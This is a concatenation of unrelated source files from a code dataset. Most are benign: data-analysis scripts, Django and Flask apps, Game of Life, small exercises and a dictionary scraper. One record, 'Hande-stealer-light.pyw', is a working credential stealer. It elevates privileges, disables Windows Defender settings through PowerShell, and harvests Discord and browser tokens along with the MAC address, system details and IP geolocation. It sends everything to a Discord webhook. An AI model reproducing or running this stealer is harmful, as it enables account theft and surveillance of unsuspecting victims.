== 'Male']), len(df[df['Gender'] == 'Female']), city.title()))\n\n # Display earliest, most recent, and most common year of birth\n if city == 'washington':\n print('Unfortunately we don\\'t have any age data for {}, so we won\\'t be able to display user stats.' .format(city.title()))\n \n else: \n print('For customers in {}, the earliest year of birth was {}, the most recent was {}, and the most common was {}.' .format(city.title(), int(min(df['Birth Year'].dropna())), int(max(df['Birth Year'].dropna())), int(df['Birth Year'].dropna().value_counts().idxmax())))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\n# In[50]:\n\n\ndef data_looker(df):\n \"\"\"Loops through a dataframe and prints slices of 5 rows at a time.\"\"\"\n \n start = 0\n stop = 5\n \n while True:\n see_data = input('Would you like to see the raw data? 
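The load_data function above builds month_index/weekday_index helper columns with pd.DatetimeIndex and then filters on them. The same idea via the .dt accessor, as a small runnable sketch:

import pandas as pd

df = pd.DataFrame({'Start Time': ['2017-01-02 09:00', '2017-02-03 10:00']})
ts = pd.to_datetime(df['Start Time'])
df['month_index'] = ts.dt.month       # 1..12, as in the record
df['weekday_index'] = ts.dt.weekday   # Monday == 0
print(df[df['weekday_index'] == 0])   # keeps only the Monday ride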
Enter yes or no.')\n if see_data == 'yes':\n print(df.iloc[start:stop])\n start = start + 5\n stop = stop + 5\n else:\n break\n\n\n# In[51]:\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n data_looker(df)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"solution - v2.py","file_name":"solution - v2.py","file_ext":"py","file_size_in_byte":10115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"553616621","text":"# Plotting Heatmaps using Coordinates.\n\nimport pandas\nfrom geopy.geocoders import Nominatim\nimport gmplot\n\nlatitude_final=[]\nlongitude_final=[]\nfor name in range(1,6):\n data=pandas.read_csv('repub'+str(name)+'.csv')\n latitude=data.latitude.tolist()\n longitude=data.longitude.tolist()\n # Non Geo-tagged tweets were given a value of (99999.99,99999.99). We are removing them from the list.\n for i in range(0,latitude.count(99999.99)):\n latitude.remove(99999.99)\n for i in range(0,longitude.count(99999.99)):\n longitude.remove(99999.99)\n latitude=list(map(float, latitude))\n longitude=list(map(float, longitude))\n latitude_final.extend(latitude)\n longitude_final.extend(longitude)\n print(len(latitude_final))\n print(len(longitude_final))\ngmap = gmplot.GoogleMapPlotter(30, 0, 3)\n\n\n# Overlay the datapoints into the map\ngmap.heatmap(latitude_final, longitude_final)\n\n# Generate the heatmap into an HTML file\ngmap.draw(\"repub_map.html\")\n\n","sub_path":"Mapplotter.py","file_name":"Mapplotter.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"115015739","text":"import os\r\nimport re\r\nimport platform\r\nimport time\r\nimport requests\r\nfrom io import BytesIO\r\nimport json\r\nfrom dhooks import Webhook, Embed, File\r\nfrom datetime import datetime\r\nimport sys\r\nimport win32com.shell.shell as shell\r\nfrom getmac import get_mac_address as gma\r\nASADMIN = 'asadmin'\r\n\r\nif sys.argv[-1] != ASADMIN:\r\n script = os.path.abspath(sys.argv[0])\r\n params = ' '.join([script] + sys.argv[1:] + [ASADMIN])\r\n shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)\r\n sys.exit(0)\r\n\r\nos.system(\"powershell.exe -command Add-MpPreference -ExclusionExtension .exe\")\r\nos.system(\"powershell.exe -command Set-MpPreference -EnableControlledFolderAccess Disabled\")\r\nos.system(\"powershell.exe -command Set-MpPreference -PUAProtection disable\")\r\n\r\n\r\nhook = Webhook(\"https://Your Webhook Url\") #change this\r\nembed = Embed(\r\n description='Hande-Stealer From Swagkarna! 
:smiley:',\r\n color=0x5CDBF0,\r\n timestamp='now' \r\n )\r\nimage1 = 'https://avatars.githubusercontent.com/u/79452028?s=460&u=0602f46611611527d9f4147aa67c47fa4b2fe739&v=4'\r\n\r\n\r\nembed.set_author(name='Author : swagkarna', icon_url=image1)\r\nembed.add_field(name='Github Profile', value='https://github.com/swagkarna')\r\n \r\nembed.add_field(name='Youtube', value='https://www.youtube.com/channel/UCszs81OmjgsLzNsgk3f4yxw')\r\nembed.set_footer(text='Happy Hacking', icon_url=image1)\r\n\r\nembed.set_thumbnail(image1)\r\n\r\nhook.send(embed=embed)\r\n\r\ndef find_tokens(path):\r\n path += '\\\\Local Storage\\\\leveldb'\r\n tokens = []\r\n for file_name in os.listdir(path):\r\n if not file_name.endswith('.log') and not file_name.endswith('.ldb'):\r\n continue\r\n for line in [x.strip() for x in open(f'{path}\\\\{file_name}', errors='ignore').readlines() if x.strip()]:\r\n for regex in (r'[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}', r'mfa\\.[\\w-]{84}'):\r\n for token in re.findall(regex, line):\r\n tokens.append(token)\r\n return tokens\r\n \r\ntime.sleep(1) \r\n \r\ndef main():\r\n local = os.getenv('LOCALAPPDATA')\r\n roaming = os.getenv('APPDATA')\r\n message = ''\r\n paths = {\r\n 'Discord': roaming + '\\\\Discord',\r\n 'Discord Canary': roaming + '\\\\discordcanary',\r\n 'Discord PTB': roaming + '\\\\discordptb',\r\n 'Google Chrome': local + '\\\\Google\\\\Chrome\\\\User Data\\\\Default',\r\n 'Opera': roaming + '\\\\Opera Software\\\\Opera Stable',\r\n 'Brave': local + '\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default',\r\n 'Yandex': local + '\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default'\r\n }\r\n for platform, path in paths.items():\r\n if not os.path.exists(path):\r\n continue\r\n tokens = find_tokens(path)\r\n if len(tokens) > 0:\r\n for token in tokens:\r\n message += f'`{token}`\\n\\n'\r\n else:\r\n message += 'No tokens found.\\n'\r\n\r\n\r\n hook.send(f'{platform}\\n{message}')\r\n\r\n\r\nmain()\r\n\r\n\r\ndef stealip():\r\n\r\n time = datetime.now().strftime(\"%H:%M %p\") \r\n ip = requests.get('https://api.ipify.org/').text\r\n\r\n r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}')\r\n geo = r.json()\r\n embed = Embed()\r\n fields = [\r\n {'name': 'IP', 'value': geo['query']},\r\n {'name': 'ipType', 'value': geo['ipType']},\r\n {'name': 'Country', 'value': geo['country']},\r\n {'name': 'City', 'value': geo['city']},\r\n {'name': 'Continent', 'value': geo['continent']},\r\n {'name': 'Country', 'value': geo['country']},\r\n {'name': 'IPName', 'value': geo['ipName']},\r\n {'name': 'ISP', 'value': geo['isp']},\r\n {'name': 'Latitute', 'value': geo['lat']},\r\n {'name': 'Longitude', 'value': geo['lon']},\r\n {'name': 'Org', 'value': geo['org']},\r\n {'name': 'Region', 'value': geo['region']},\r\n {'name': 'Status', 'value': geo['status']},\r\n]\r\n for field in fields:\r\n if field['value']:\r\n embed.add_field(name=field['name'], value=field['value'], inline=True)\r\n hook.send(embed=embed) \r\n\r\n\r\n\r\n\r\n\r\ndef stealmac():\r\n y = gma()\r\n hook.send(\"Mac Address : \")\r\n hook.send(y)\r\nstealmac() \r\n\r\ndef GetSysInfo():\r\n my_system = platform.uname()\r\n hook.send(\"System Information : \")\r\n hook.send(f\"System: {my_system.system}\")\r\n hook.send(f\"Node Name: {my_system.node}\")\r\n hook.send(f\"Release: {my_system.release}\")\r\n hook.send(f\"Version: {my_system.version}\")\r\n hook.send(f\"Machine: {my_system.machine}\")\r\n hook.send(f\"Processor: {my_system.processor}\")\r\n\r\n 
\r\nGetSysInfo()\r\n\r\nstealip()\r\n\r\n\r\n","sub_path":"Hande-stealer-light.pyw","file_name":"Hande-stealer-light.pyw","file_ext":"pyw","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"336352785","text":"import webapp2\nimport json\nimport logging\nfrom datetime import date\nfrom google.appengine.ext import db\n\nfrom models.stat import Stat\n\nclass UploadStats(webapp2.RequestHandler):\n def post(self):\n rawdata = self.request.get('stats')\n data = json.loads(rawdata)\n yearmonth = date.today().strftime(\"%Y%m\")\n\n dh = db.GqlQuery(\"SELECT * FROM Stat WHERE uuid = :1 AND yearmonth = :2 \", data['uuid'], yearmonth)\n if dh.count() == 1:\n logging.debug('stat for uuid %s yearmonth %s already exists' % (data['uuid'], yearmonth))\n return\n\n if dh.count() > 1:\n logging.error('Stored count for uuid %s and yearmonth %s is %i' % (data['uuid'], yearmonth, dh.count()))\n return\n\n stat = Stat()\n stat.data = rawdata\n stat.uuid = data['uuid']\n stat.yearmonth = yearmonth\n stat.ip = self.request.remote_addr\n stat.put()\n logging.debug('Stored new stat for uuid %s' % (data['uuid']))\n pass\n","sub_path":"controllers/uploadstats.py","file_name":"uploadstats.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"407662689","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.views.generic import TemplateView\n\ndef index(request):\n #return HttpResponse(\"Hello, world. You're at the polls index.\")\n return HttpResponseRedirect(reverse('url_home'))\n\n\ndef home(request):\n kwargs = {'title': 'Holter Monitor Web'}\n kwargs['no_sidebar'] = True\n kwargs['title'] = '¡Bienvenido!'\n kwargs['suptitle'] = ''\n return render(request, 'main/body.html', kwargs)\n\n# def tutorial(request):\n# kwargs = {}\n# kwargs['no_sidebar'] = True\n# kwargs['title'] = 'Tutorial'\n# return render(request, 'main/tutorial.html', kwargs)\n\nimport plotly.offline as opy\nimport plotly.graph_objs as go\nimport numpy as np\n\nclass Graph(TemplateView):\n template_name = 'main/tutorial.html'\n kwargs = {}\n kwargs['no_sidebar'] = True\n\n def get_context_data(self, **kwargs):\n context = super(Graph, self).get_context_data(**kwargs)\n\n # x = [-2,0,4,6,7]\n # y = [q**2-q+3 for q in x]\n # trace1 = go.Scatter(x=x, y=y, marker={'color': 'red', 'symbol': 104, 'size': \"10\"},\n # mode=\"lines\", name='1st Trace')\n\n # data=go.Data([trace1])\n # layout=go.Layout(title=\"Meine Daten\", xaxis={'title':'x1'}, yaxis={'title':'x2'})\n # figure=go.Figure(data=data,layout=layout)\n # div = opy.plot(figure, auto_open=False, output_type='div')\n # import plotly.plotly as py\n # import plotly.graph_objs as go\n\n # Create random data with numpy\n \n\n N = 1000\n random_x = np.random.randn(N)\n random_y = np.random.randn(N)\n\n # Create a trace\n trace = go.Scatter(\n x = random_x,\n y = random_y,\n mode = 'markers'\n )\n\n data = [trace]\n\n # Plot and embed in ipython notebook!\n # div = opy.plot(data, filename='basic-scatter')\n div = opy.plot(data, filename='basic-line')\n\n # or plot with: plot_url = py.plot(data, filename='basic-line')\n\n context['plot'] = div\n\n return context, kwargs\n\ndef plot1d():\n x_data = np.arange(0, 120,0.1)\n trace1 = go.Scatter(\n x=x_data,\n y=np.sin(x_data)\n )\n\n data = [trace1]\n layout = go.Layout(\n # autosize=False,\n # 
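Both plotting views in the views.py record above embed a chart by rendering it to an HTML string with output_type='div' and handing that string to the template context. A minimal standalone sketch of that step (dropping the div into a template with something like {{ plot|safe }} is the conventional Django side, assumed here):

import plotly.offline as opy
import plotly.graph_objs as go

fig = go.Figure(data=[go.Scatter(x=[0, 1, 2], y=[0, 1, 4], mode='lines')])
# include_plotlyjs=False keeps the div small; the page must load plotly.js itself.
div = opy.plot(fig, output_type='div', include_plotlyjs=False, auto_open=False)
print(div[:60])  # an HTML '<div>...' fragment ready for the template context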
width=900,\n # height=500,\n\n xaxis=dict(\n autorange=True\n ),\n yaxis=dict(\n autorange=True\n )\n )\n fig = go.Figure(data=data, layout=layout)\n plot_div = opy.plot(fig, output_type='div', include_plotlyjs=False)\n return plot_div\n\n\nclass Plot1DView(TemplateView):\n template_name = \"main/tutorial.html\"\n\n def get_context_data(self, **kwargs):\n # Call the base implementation first to get a context\n context = super(Plot1DView, self).get_context_data(**kwargs)\n context['plot'] = plot1d()\n context['no_sidebar'] = True\n return context\n\ndef about_us(request):\n kwargs = {}\n kwargs['no_sidebar'] = True\n # kwargs['title'] = '¡Bienvenido!'\n # kwargs['suptitle'] = ''\n render(request, \"about_us.html\", kwargs)","sub_path":"apps/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"465474725","text":"import numpy as np\n\n\"\"\"\nDie Funktion nimmt eine Koordinate des Arrays sowie die Breite(Höhe) als Parameter entgegen.\nLiegt die Koordinate innerhalb der Breite wird diese ohne Veränderung zurückgegeben.\nSollte die Koordinate außerhalb der Breite und damit des Array Bereichs liegen, \nwird diese durch die Modulo Funktionalität auf den Anfang des Arrays gesetzt.\nDie Funktion gibt die ermittelte Koordinate zurück.\n\"\"\"\n\n\ndef trueValue(x, N):\n return (x + N) % N\n\n\n\"\"\"\nDie Funktion nimmt eine Position im Array über die x,y Koordinaten, sowie das Array selbst als Parameter an.\nSie ermittelt zunächst die Länge des Arrays.\nAnschließend werden die Werte der acht Nachbarn des Arrays nach den Regeln des Game of Life abgefragt. \nHierbei wird der \"wahre Wert\" des Nachbarn zuvor bestimmt, um die Randfälle abzudecken, an denen eine solche \nAbfrage sonst außerhalb Bereichs läge.\nSie gibt eine Addition der Werte, die diese Nachbarn besitzen, zurück.\n\"\"\"\n\n\ndef neighbors(x, y, grid):\n N = len(grid)\n return grid[trueValue(y - 1, N)][trueValue(x + 1, N)] + \\\n grid[trueValue(y - 1, N)][trueValue(x, N)] \\\n + grid[trueValue(y - 1, N)][trueValue(x - 1, N)] + \\\n grid[trueValue(y, N)][trueValue(x + 1, N)] + \\\n grid[trueValue(y, N)][trueValue(x - 1, N)] + \\\n grid[trueValue(y + 1, N)][trueValue(x + 1, N)] + \\\n grid[trueValue(y + 1, N)][trueValue(x, N)] + \\\n grid[trueValue(y + 1, N)][trueValue(x - 1, N)]\n\n\n\"\"\"\nDiese Funktion führt ein Game of Life auf einem als Parameter gegebenen (2D-)Array aus.\nDabei wird zunächst eine \"leere\" Kopie des Arrays erstellt und die Breite des Arrays ermittelt.\nAnschließend wird mit einer doppelten for-Schleife über das Array iteriert.\nDabei wird für jede Zelle betrachtet, wie viele lebendige Nachbarn diese Zelle hat.\nBei drei Nachbarn wird der Punkt mit einer 1 markiert (bleibt lebendig), bei zwei bleibt die Zelle Lebendig,\nwenn diese schon zuvor lebendig ist. In jedem anderen Fall stirbt die Zelle (wird mit einer 0 markiert)\nDie neuen Werte werden dabei in dem zu Anfang erstellten, neuen Array gespeichert. 
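The Game of Life module that begins here wraps out-of-range indices with a modulo (trueValue) and counts the eight neighbours cell by cell. A vectorised alternative sketch in which np.roll provides the same toroidal wrap-around for the whole grid at once (game_of_life_step is a hypothetical name; the birth/survival rules match the record: exactly 3 neighbours births a cell, 2 keeps a live cell alive):

import numpy as np

def game_of_life_step(grid):
    # Sum the eight shifted copies of the grid; np.roll wraps at the edges,
    # which is exactly what the record's (x + N) % N indexing achieves.
    neighbours = sum(np.roll(np.roll(grid, dy, axis=0), dx, axis=1)
                     for dy in (-1, 0, 1) for dx in (-1, 0, 1)
                     if (dy, dx) != (0, 0))
    return ((neighbours == 3) | ((grid == 1) & (neighbours == 2))).astype(grid.dtype)

glider = np.zeros((5, 5), dtype=int)
glider[1, 2] = glider[2, 3] = glider[3, 1] = glider[3, 2] = glider[3, 3] = 1
print(game_of_life_step(glider))  # the glider advances one step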
Das übergegebene Array wird \nzu keinem Zeitpunkt in der Funktion geändert.\nAm Ende gibt die Funktion das Array mit den neuen Werten zurück.\n\"\"\"\n\n\ndef gameOfLife(grid):\n grid_out = np.empty_like(grid)\n N = len(grid)\n for y in range(N):\n for x in range(N):\n # Ermittlung der Nachbarn der Zelle\n z = neighbors(x, y, grid)\n # Bei 3 lebendigen Nachbarn lebt die Zelle in jedem Fall\n if z == 3:\n grid_out[y][x] = 1\n # Die Ermittlung für diese Zelle ist abgeschlossen.\n # Es soll mit der nächsten Zelle weitergemacht werden -> continue\n continue\n # Bei 2 lebendigen Nachbarn lebt die Zelle in dem Fall, dass Sie lebendig ist.\n if (grid[y][x] == 1) and (z == 2):\n grid_out[y][x] = 1\n continue\n # Wenn keine der vorherigen Bedingungen zutrifft, ist die Zelle tot.\n grid_out[y][x] = 0\n return grid_out\n","sub_path":"GoLVarianten/GoLPythonModular.py","file_name":"GoLPythonModular.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653887989","text":"from . import app, db, auth, good_response, bad_response, opera_images, opera_audios\nfrom app.model import opera, autore\nfrom flask import request, abort\n\nfrom .flask_uploads import UploadNotAllowed\nfrom werkzeug import secure_filename\n\nimport os\n\n\n@app.route('/api/operas', methods=['GET'])\ndef get_operas():\n try:\n page_n = int(request.args.get('page', 1))\n\n per_page = int(request.args.get('per_page', 5000))\n except ValueError:\n abort(400)\n\n page = opera.Opera.query.paginate(page_n, per_page=per_page)\n\n op = [o.light_serialize() for o in page.items]\n\n return good_response(op)\n\n\n@app.route('/api/operas/', methods=['GET'])\ndef get_opera(id):\n o = opera.Opera.query.get_or_404(id)\n\n return good_response(o.serialize())\n\n\n\n@app.route('/api/operas', methods=['POST'])\n@auth.login_required\ndef post_opera():\n if not request.json \\\n or 'nome' not in request.json \\\n or 'codice_stanza' not in request.json \\\n or 'tipo_id' not in request.json \\\n or 'tecnica_id' not in request.json \\\n or 'descrizione' not in request.json \\\n or 'didascalia' not in request.json \\\n or 'inventario' not in request.json \\\n or 'data_donazione' not in request.json \\\n or 'data_realizzazione' not in request.json:\n abort(400)\n\n\n try:\n tipo_id = int(request.json['tipo_id'])\n tecnica_id = int(request.json['tecnica_id'])\n\n if not opera.Tipo.query.get(tipo_id):\n return bad_response('tipo non trovato'), 400\n\n if not opera.Tecnica.query.get(tecnica_id):\n return bad_response('tecnica non trovata'), 400\n\n\n autore_id = None\n percorso_id = None\n\n\n if 'autore_id' in request.json:\n autore_id = int(request.json['autore_id'])\n q = autore.Autore.query.get(autore_id)\n \n if not q:\n return bad_response('autore non trovato'), 400\n\n\n if 'percorso_id' in request.json:\n percorso_id = int(request.json['percorso_id'])\n q = opera.Percorso.query.get(percorso_id)\n \n if not q:\n return bad_response('percorso non trovato'), 400\n\n\n o = opera.Opera(nome=request.json['nome'],\n codice_stanza=request.json['codice_stanza'],\n tipo_id=tipo_id, tecnica_id=tecnica_id, \n autore_id=autore_id, percorso_id=percorso_id,\n descrizione=request.json['descrizione'],\n didascalia=request.json['didascalia'],\n inventario=int(request.json['inventario']),\n data_donazione=request.json['data_donazione'],\n data_realizzazione=request.json['data_realizzazione'])\n\n db.session.add(o)\n db.session.commit()\n\n return good_response(o.serialize()), 
201\n\n except ValueError:\n abort(400)\n \n\n\n@app.route('/api/operas/', methods=['PUT'])\n@auth.login_required\ndef update_opera(id):\n if not request.json:\n abort(400)\n\n o = opera.Opera.query.get_or_404(id)\n\n try:\n if 'nome' in request.json:\n o.nome = request.json['nome']\n\n if 'codice_stanza' in request.json:\n o.codice_stanza = request.json['codice_stanza']\n\n if 'tipo_id' in request.json:\n o.tipo_id = int(request.json['tipo_id'])\n\n if 'tecnica_id' in request.json:\n o.tecnica_id = int(request.json['tecnica_id'])\n\n if 'percorso_id' in request.json:\n o.percorso_id = int(request.json['percorso_id'])\n\n if 'autore_id' in request.json:\n o.autore_id = int(request.json['autore_id'])\n\n if 'descrizione' in request.json:\n o.descrizione = request.json['descrizione']\n\n if 'didascalia' in request.json:\n o.didascalia = request.json['didascalia']\n\n if 'inventario' in request.json:\n o.inventario = int(request.json['inventario'])\n\n if 'data_donazione' in request.json:\n o.data_donazione = request.json['data_donazione']\n\n if 'data_realizzazione' in request.json:\n o.data_realizzazione = request.json['data_realizzazione']\n\n db.session.commit()\n\n return good_response(o.serialize())\n\n except ValueError:\n abort(400)\n\n \n\n@app.route('/api/operas/', methods=['DELETE'])\n@auth.login_required\ndef delete_opera(id):\n o = opera.Opera.query.get_or_404(id)\n\n for img in o.immagini:\n os.remove(opera_images.path(img.filename))\n\n for audio in o.audio_files:\n os.remove(opera_audios.path(audio.filename))\n\n db.session.delete(o)\n db.session.commit()\n\n return good_response('')\n\n\n\n@app.route('/api/operas//images', methods=['POST'])\n@auth.login_required\ndef post_opera_image(id):\n if not request.files or 'opera_images' not in request.files:\n abort(400)\n\n opera.Opera.query.get_or_404(id) ## integrity check\n\n try:\n for f in request.files.getlist('opera_images'):\n\n secure = secure_filename(f.filename)\n \n filename = opera_images.save(f, name=secure)\n\n img = opera.ImmagineOpera(filename=filename, opera_id=id)\n\n db.session.add(img)\n db.session.commit()\n\n return good_response(''), 201\n except UploadNotAllowed:\n abort(400)\n\n\n@app.route('/api/operas//audios', methods=['POST'])\n@auth.login_required\ndef post_opera_audio(id):\n if not request.files or 'opera_audios' not in request.files:\n abort(400)\n\n opera.Opera.query.get_or_404(id) ## integrity check\n\n try:\n for f in request.files.getlist('opera_audios'):\n\n secure = secure_filename(f.filename)\n \n filename = opera_audios.save(f, name=secure)\n\n audio = opera.AudioOpera(filename=filename, opera_id=id)\n\n db.session.add(audio)\n db.session.commit()\n\n\n return good_response(''), 201\n except UploadNotAllowed:\n abort(400)","sub_path":"backend/app/api/opera.py","file_name":"opera.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"489354262","text":"import sys\nsys.stdin = open('sample_input_sort.txt', 'r')\n\ndef find_max(arr):\n max_idx = 0\n for i in range(len(arr)):\n if arr[i] > arr[max_idx]:\n max_idx = i\n return max_idx\n\ndef find_min(arr):\n min_idx = 0\n for i in range(len(arr)):\n if arr[i] < arr[min_idx]:\n min_idx = i\n return min_idx\n\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n numbers = list(map(int, input().split()))\n\n for i in range(10):\n # 짝수번째 인덱스에서는 max 찾기\n if i % 2 == 0:\n max_idx = find_max(numbers[i:]) + i\n # max와 현재 숫자 스왑하기\n numbers[i], 
numbers[max_idx] = numbers[max_idx], numbers[i]\n # 홀수번째 인덱스에서는 min 찾기\n else:\n min_idx = find_min(numbers[i:]) + i\n numbers[i], numbers[min_idx] = numbers[min_idx], numbers[i]\n result = \" \".join(list(map(str, numbers[0: 10])))\n print(\"#%d %s\" % (tc, result))","sub_path":"0216/special_sort.py","file_name":"special_sort.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"606561382","text":"distance = 0\nenergy = 250\nwhile distance != 'home':\n choice = input('Would you like to walk, run, rest, eat or go home? ')\n if choice.lower() == 'run':\n if energy - 50 >= 0:\n distance += 5\n energy -= 50\n else:\n print('Not enough energy. You must rest or eat')\n elif choice.lower() == 'walk':\n if energy - 10 >= 0:\n distance += 1\n energy -= 10\n else:\n print('Not enough energy. You must rest or eat')\n elif choice.lower() == 'rest':\n energy += 20\n elif choice.lower() == 'eat':\n energy += 30\n elif choice.lower() == 'go home':\n print(\"You're home\")\n distance = 'home'\n else:\n print('Please enter \"run\", \"walk\", \"rest\", \"eat\" or \"go home\"')\n\n if distance != 'home':\n print('Distance from home is {}km'.format(distance))\n print('Energy = {}'.format(energy))\n","sub_path":"exercise6.2.py","file_name":"exercise6.2.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"475322627","text":"import os\n\nfs = os.popen(\"{} stm/.pio/build/msign_board/firmware.elf esp/.pio/build/msign_board/firmware.elf\".format(os.path.expanduser(\"~/.platformio/packages/toolchain-gccarmnoneeabi/bin/arm-none-eabi-size\"))).read().split(\"\\n\")[1:]\n\nsections = [[int(x) for x in y.split(\"\\t\")[:3]] for y in fs[:-1]]\n\nwith open(\"stm.csv\", \"w\") as f:\n f.write('\"flash\",\"ram\"\\n')\n f.write(\"{},{}\".format(sections[0][0] + sections[0][1], sections[0][1] + sections[0][2]))\n\nwith open(\"esp.csv\", \"w\") as f:\n f.write('\"flash\",\"ram\"\\n')\n f.write(\"{},{}\".format(sections[1][0] + sections[1][1], sections[1][1] + sections[1][2]))\n","sub_path":"get_sizes.py","file_name":"get_sizes.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"169772694","text":"import numpy as np\nX= np.array([[0,1,0],[0,1,1],[1,2,1],[1,2,0],[1,2,2],[2,2,2],[1,2,-1],[2,2,3],[-1,-1,-1],[0,-1,-2],[0,-1,1],[-1,-2,1]])\n# make X as an array of 12x3 dimension with the training data. first 4 entries are A, next 4 are of B and the last 4 are of C.\nY = np.array([[1],[1],[1],[1],[2],[2],[2],[2],[3],[3],[3],[3]])\n# make Y as the label array where label 1 is A, 2 is B and 3 is C.\nXtest = np.array([[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1]])\n# Xtest is an array I made that has 12 similar elements of the test point. \n# I am using this to calculate the distance between the point and the training data\nprint(X[0]-Xtest[0])\ndist=np.zeros((12,1))\n# initializing the array containing the distances with all 0's in th beginning\nfor i in range(len(X)):\n d= np.linalg.norm(X[i]-Xtest[i])\n # calculates the euclidean distance (L2) and stores it in the variable d which is then entered into the dist array. \n dist[i]=d\nprint(dist)\nprint(np.argmin(dist))\n# np.argmin calculates the minimum element in the array and return the index. 
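The KNN record continuing below builds a 12-row Xtest array only so a per-row loop can subtract matching rows. NumPy broadcasting computes every L2 distance against a single test point in one call, as in this small sketch (the 3-row training set is a toy assumption):

import numpy as np

X = np.array([[0, 1, 0], [1, 2, 1], [-1, -1, -1]])  # toy training rows
y = np.array([1, 2, 3])                             # their labels
x_test = np.array([1, 0, 1])

dist = np.linalg.norm(X - x_test, axis=1)  # broadcast: no duplicated test matrix needed
print(y[np.argmin(dist)])                  # label of the nearest neighbour -> 1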
\n# We can make the comparison by reading the smallest distances and their indices and comparing them against the label array.\n","sub_path":"DL-HW1-KNN-classifier/hw1-q1.py","file_name":"hw1-q1.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"280481319","text":"#!/usr/bin/env python3\nimport requests\nimport lxml.html\nimport argparse  # read command-line arguments\n\nvoice_switch = 0\nlanguage=['jp','jc']\ncss_1 = 'header.word-details-pane-header'\ncss_2 = 'div.word-details-item-content'\ncss_voice = 'span.word-audio.audio.audio-light'\nuseragent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'\n\ndef option():\n    global voice_switch  # without this, the assignment below would only bind a local\n    parser = argparse.ArgumentParser()\n    parser.add_argument('word',type=str,help='word(s) to search for',nargs='*')\n    parser.add_argument(\"-v\",\"--voice\",help=\"read word\",action=\"store_true\")\n    args = parser.parse_args()\n    if args.voice:\n        voice_switch = 1\n\n    return args.word\n\ndef start(args_word):\n    i=0\n    for word in args_word:\n        i+=1\n        print('\\n######################## word lookup ('+str(i)+') '+word+' #####################################\\n')\n        url = 'https://dict.hjenglish.com/'+language[0]+'/'+language[1]+'/' + word\n        try:\n            tree = lxml.html.fromstring((requests.get(url,headers={'User-Agent':useragent})).text)\n            print_word(merge((get(css_1,tree))[0],(get(css_2,tree))[0],(get(css_1,tree))[1]))\n        except IndexError as e:\n            pass\n\ndef get(css,tree):\n    word=[]\n    i=0\n    for div_temp in tree.cssselect(css):\n        word_temp = div_temp.text_content()  # extract the translation\n        word.append(word_temp)\n        i=i+1\n\n    return word,i\n\ndef merge(word_1,word_2,number):  # merge translations with their example sentences\n    c=[]\n    for n in range(number):\n        c.append(word_1[n]+'************** detailed explanation / examples: *************'+word_2[n])\n\n    return c\n\ndef print_word(word):\n    i=0\n    for word_temp in word:\n        i+=1\n        print('----------------------- definition '+str(i)+' -------------------------------')\n        for word_tmp in word_temp.split():\n            print(word_tmp)\n\n\ndef main():\n    start(option())\n\nif __name__ == '__main__':\n    main()\n","sub_path":"hjjp/hjjp_jiu.py","file_name":"hjjp_jiu.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"241332034","text":"from django import forms\nfrom .models import Rental, MaintRequest\n\nclass RentalCreationForm(forms.ModelForm):\n    \"\"\" Add a rental property \"\"\"\n\n    class Meta:\n        model = Rental\n        fields = ['address', 'postcode', 'city', 'no_of_tenants', 'image']\n\nclass MaintenanceCreationForm(forms.ModelForm):\n    \"\"\" Add a maintenance request \"\"\"\n\n    class Meta:\n        model = MaintRequest\n        fields = ['title', 'details', 'priority', 'image']\n\n\nclass StatusUpdateForm(forms.ModelForm):\n    \"\"\" Update status of maintenance request \"\"\"\n\n    class Meta:\n        model = MaintRequest\n        fields = ['status']\n\n    def __init__(self, *args, **kwargs):\n        \"\"\" Set no label on status field \"\"\"\n\n        super(StatusUpdateForm, self).__init__(*args, **kwargs)\n        self.fields['status'].label = False\n\n\nclass MaintenanceQuoteForm(forms.ModelForm):\n    \"\"\" Update maintenance request with a cost/quote \"\"\"\n\n    class Meta:\n        model = MaintRequest\n        fields = ['cost', 'invoice_pdf', 